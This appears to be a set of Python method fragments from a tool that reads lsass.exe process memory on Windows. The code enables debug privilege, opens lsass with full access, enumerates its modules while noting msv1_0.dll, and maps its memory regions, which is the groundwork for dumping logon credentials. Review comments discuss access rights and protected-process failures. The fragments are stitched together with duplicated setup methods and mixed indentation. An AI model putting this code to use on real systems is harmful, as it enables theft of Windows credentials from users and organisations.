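    def setup(self):
        """Gather everything needed to read lsass.exe memory: system info, the
        OS build number, a process handle, the loaded modules and the
        address-space map.

        Order matters: SeDebugPrivilege is enabled before OpenProcess, and the
        handle must exist before modules and regions are enumerated.

        Populates ``self.processor_architecture``, ``self.BuildNumber``,
        ``self.lsass_process_handle``, ``self.msv_dll_timestamp`` (only when
        msv1_0.dll is among the modules), and appends to ``self.modules`` and
        ``self.pages`` -- both are assumed to be lists initialised elsewhere
        (presumably in ``__init__``).

        Raises:
            Exception: if lsass.exe cannot be opened; the Win32 error text is
                included. Access denied here usually means the caller lacks
                SeDebugPrivilege/admin rights or lsass runs as a protected
                process (PPL), neither of which is checked up front.
        """
        logging.log(1, 'Enabling debug privilege')
        enable_debug_privilege()
        logging.log(1, 'Getting generic system info')
        sysinfo = GetSystemInfo()
        self.processor_architecture = PROCESSOR_ARCHITECTURE(
            sysinfo.id.w.wProcessorArchitecture)

        logging.log(1, 'Getting build number')
        # GetVersionEx().dwBuildNumber is unreliable from frozen binaries, so
        # the build number is read from the registry instead. ``with`` closes
        # the registry key handle on every exit path instead of leaking it.
        with winreg.OpenKey(
                winreg.HKEY_LOCAL_MACHINE,
                'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\') as key:
            buildnumber, _ = winreg.QueryValueEx(key, 'CurrentBuildNumber')
        self.BuildNumber = int(buildnumber)

        logging.log(1, 'Searching for lsass.exe')
        pid = get_lsass_pid()
        logging.log(1, 'Lsass.exe found at PID %d' % pid)
        logging.log(1, 'Opening lsass.exe')
        # NOTE(review): PROCESS_ALL_ACCESS is broader than module enumeration
        # and memory reads need (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
        # would do). Left as-is because code outside this block may rely on
        # the wider rights -- confirm before narrowing. Handle is not
        # inheritable (bInheritHandle=False).
        self.lsass_process_handle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
        if self.lsass_process_handle is None:
            # Read the error code immediately: any intervening Win32 call
            # (including console logging) could overwrite it.
            raise Exception('Failed to open lsass.exe Reason: %s' %
                            WinError(get_last_error()))

        logging.log(1, 'Enumerating modules')
        module_handles = EnumProcessModules(self.lsass_process_handle)
        for module_handle in module_handles:
            module_file_path = GetModuleFileNameExW(self.lsass_process_handle,
                                                    module_handle)
            logging.log(1, module_file_path)
            timestamp = 0
            if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
                # The msv1_0.dll timestamp is kept for a consumer outside this
                # block. NOTE(review): on Windows ``st_ctime`` is the creation
                # time today but is deprecated since Python 3.12 in favour of
                # ``st_birthtime`` -- confirm which semantics the consumer
                # expects before upgrading.
                timestamp = int(os.stat(module_file_path).st_ctime)
                self.msv_dll_timestamp = timestamp
            modinfo = GetModuleInformation(self.lsass_process_handle,
                                           module_handle)
            self.modules.append(
                Module.parse(module_file_path, modinfo, timestamp))

        logging.log(1, 'Found %d modules' % len(self.modules))

        # Walk the user-mode address range region by region. VirtualQueryEx is
        # assumed to raise on failure or return a non-zero RegionSize; a zero
        # RegionSize would make this loop spin forever.
        current_address = sysinfo.lpMinimumApplicationAddress
        while current_address < sysinfo.lpMaximumApplicationAddress:
            page_info = VirtualQueryEx(self.lsass_process_handle,
                                       current_address)
            self.pages.append(Page.parse(page_info))
            current_address += page_info.RegionSize

        logging.log(1, 'Found %d pages' % len(self.pages))

        # Attach each region to the module whose range contains its base
        # address; a region matching no module is simply left unattached.
        for page in self.pages:
            for mod in self.modules:
                if mod.inrange(page.BaseAddress) == True:
                    mod.pages.append(page)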
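	def open(self):
		"""Resolve and open the target process, caching the handle in ``self.phandle``.

		Always refreshes ``self.sysinfo`` and ``self.processor_architecture``.
		If no handle was supplied, the PID is looked up from ``self.name`` via
		``pid_for_name`` when needed, and the process is opened with the rights
		in ``self.access`` (handle not inheritable). A pre-supplied handle is
		used as-is.

		Raises:
			Exception: if neither a name, a PID nor a handle was provided, or if
				OpenProcess fails; the message names the target and carries the
				Win32 error text.
		"""
		self.sysinfo = GetSystemInfo()
		self.processor_architecture = PROCESSOR_ARCHITECTURE(self.sysinfo.id.w.wProcessorArchitecture)
		if self.phandle is not None:
			return
		if self.pid is None:
			if self.name is None:
				raise Exception('Process name or PID or opened handle must be provided')
			self.pid = pid_for_name(self.name)

		self.phandle = OpenProcess(self.access, False, self.pid)
		if self.phandle is None:
			# Format arguments are (name, pid, reason) to match the template;
			# WinError() is evaluated right away so the error code is not
			# clobbered by a later Win32 call. NOTE(review): ctypes.WinError()
			# reads GetLastError(); if the OpenProcess wrapper is bound with
			# use_last_error=True, ctypes.get_last_error() is the right source.
			raise Exception('Failed to open %s(%s) Reason: %s' % (self.name, self.pid, ctypes.WinError()))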
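    def setup(self):
        """Gather system info, a handle to the target process, its loaded
        modules and its address-space map.

        The target is taken from the first of ``self.process_handle``,
        ``self.process_pid`` or ``self.process_name`` that is set (in that
        order); a name is resolved to a PID with ``pid_for_name``.
        SeDebugPrivilege is enabled before any OpenProcess call.

        Populates ``self.processor_architecture``, ``self.BuildNumber``,
        ``self.process_pid``/``self.process_handle`` (when resolved here),
        ``self.msv_dll_timestamp`` (only when msv1_0.dll is among the modules),
        and appends to ``self.modules`` and ``self.pages`` -- both assumed to
        be lists initialised elsewhere (presumably in ``__init__``).

        Raises:
            Exception: if no name, PID or handle was provided, or if the
                process cannot be opened; the Win32 error text is included.
                Access denied usually means missing SeDebugPrivilege/admin
                rights or a protected (PPL) target.
        """
        logging.log(1, 'Enabling debug privilege')
        enable_debug_privilege()
        logging.log(1, 'Getting generic system info')
        sysinfo = GetSystemInfo()
        self.processor_architecture = PROCESSOR_ARCHITECTURE(
            sysinfo.id.w.wProcessorArchitecture)

        logging.log(1, 'Getting build number')
        # GetVersionEx().dwBuildNumber is unreliable from frozen binaries, so
        # the build number is read from the registry instead. ``with`` closes
        # the registry key handle on every exit path instead of leaking it.
        with winreg.OpenKey(
                winreg.HKEY_LOCAL_MACHINE,
                'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\') as key:
            buildnumber, _ = winreg.QueryValueEx(key, 'CurrentBuildNumber')
        self.BuildNumber = int(buildnumber)

        if self.process_handle is None:
            if self.process_pid is None:
                if self.process_name is None:
                    raise Exception(
                        'Process name or PID or opened handle must be provided'
                    )

                # Messages name the actual target rather than assuming lsass.
                logging.log(1, 'Searching for %s' % self.process_name)
                self.process_pid = pid_for_name(self.process_name)
                logging.log(
                    1, '%s found at PID %d' %
                    (self.process_name, self.process_pid))
                # NOTE(review): no protected-process (PPL / RunAsPPL) check is
                # performed here. If the target is protected, OpenProcess
                # below fails with access denied and that is what gets raised.

            # Human-readable target for log/error text; the name may be absent
            # when only a PID was supplied.
            target = (self.process_name if self.process_name is not None
                      else 'PID %d' % self.process_pid)
            logging.log(1, 'Opening %s' % target)
            # NOTE(review): PROCESS_ALL_ACCESS is broader than module
            # enumeration and memory reads need (PROCESS_QUERY_INFORMATION |
            # PROCESS_VM_READ would do). Left as-is because code outside this
            # block may rely on the wider rights -- confirm before narrowing.
            self.process_handle = OpenProcess(PROCESS_ALL_ACCESS, False,
                                              self.process_pid)
            if self.process_handle is None:
                # WinError() is evaluated immediately so the error code is not
                # clobbered. NOTE(review): it reads GetLastError(); if the
                # OpenProcess wrapper is bound with use_last_error=True,
                # ctypes.get_last_error() is the right source.
                raise Exception('Failed to open %s Reason: %s' %
                                (target, ctypes.WinError()))
        else:
            logging.debug('Using pre-defined handle')

        logging.log(1, 'Enumerating modules')
        module_handles = EnumProcessModules(self.process_handle)
        for module_handle in module_handles:
            module_file_path = GetModuleFileNameExW(self.process_handle,
                                                    module_handle)
            logging.log(1, module_file_path)
            timestamp = 0
            if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
                # The msv1_0.dll timestamp is kept for a consumer outside this
                # block. NOTE(review): on Windows ``st_ctime`` is the creation
                # time today but is deprecated since Python 3.12 in favour of
                # ``st_birthtime`` -- confirm which semantics the consumer
                # expects before upgrading.
                timestamp = int(os.stat(module_file_path).st_ctime)
                self.msv_dll_timestamp = timestamp
            modinfo = GetModuleInformation(self.process_handle, module_handle)
            self.modules.append(
                Module.parse(module_file_path, modinfo, timestamp))

        logging.log(1, 'Found %d modules' % len(self.modules))

        # Walk the user-mode address range region by region. VirtualQueryEx is
        # assumed to raise on failure or return a non-zero RegionSize; a zero
        # RegionSize would make this loop spin forever.
        current_address = sysinfo.lpMinimumApplicationAddress
        while current_address < sysinfo.lpMaximumApplicationAddress:
            page_info = VirtualQueryEx(self.process_handle, current_address)
            self.pages.append(Page.parse(page_info))
            current_address += page_info.RegionSize

        logging.log(1, 'Found %d pages' % len(self.pages))

        # Attach each region to the module whose range contains its base
        # address; a region matching no module is simply left unattached.
        for page in self.pages:
            for mod in self.modules:
                if mod.inrange(page.BaseAddress) == True:
                    mod.pages.append(page)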